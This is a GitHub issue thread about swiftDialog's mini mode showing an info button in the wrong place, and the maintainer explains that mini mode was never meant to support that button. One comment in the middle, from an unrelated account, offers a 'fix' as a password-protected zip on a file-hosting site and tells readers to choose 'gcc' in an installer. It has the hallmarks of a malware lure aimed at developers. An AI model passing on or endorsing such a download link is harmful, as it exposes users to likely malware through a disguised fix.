### ISSUE TITLE
Mini style with infobutton displays infobutton too far to the left

### ISSUE THREAD

**Issue by timnottom** [swiftDialog/swiftDialog#427]
When using:
`dialog --mini --infobuttontext "more info"`

the result is:
![Screenshot 2024-08-26 at 13 59 57](https://github.com/user-attachments/assets/9d7235f2-ae5f-4cb6-b5d5-ce8a31553039)

I think the infobutton is too far to the left, maybe it's pushed out of the way by a hidden element?

**Comment by bartreardon** [comment]
It's more along the lines of "the more info button shouldn't be showing at all" - mini mode was not designed to support the info button 🙂

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by timnottom** [comment]
Ah thanks @bartreardon, did not know that 👌
